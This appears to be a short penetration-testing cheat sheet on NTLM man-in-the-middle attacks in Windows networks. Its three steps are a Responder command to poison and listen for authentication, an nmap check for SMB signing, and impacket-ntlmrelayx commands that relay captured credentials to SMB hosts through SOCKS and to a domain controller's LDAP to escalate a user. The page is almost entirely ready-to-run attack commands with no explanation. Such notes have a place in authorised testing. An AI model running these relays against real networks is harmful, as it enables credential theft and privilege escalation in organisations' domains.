MiTM (Listen & Relay)

  1. Listening

To disable responder edit /etc/responder/Responder.conf

sudo responder -A -I tun0 -v

  1. Check singing

nmap --script=smb2-security-mode.nse -p445 $net --open

  1. Relay to another machine

impacket-ntlmrelayx -tf targets.txt -smb2support -socks

impacket-ntlmrelayx -t ldap://dc.domain.local --escalate-user username

Last updated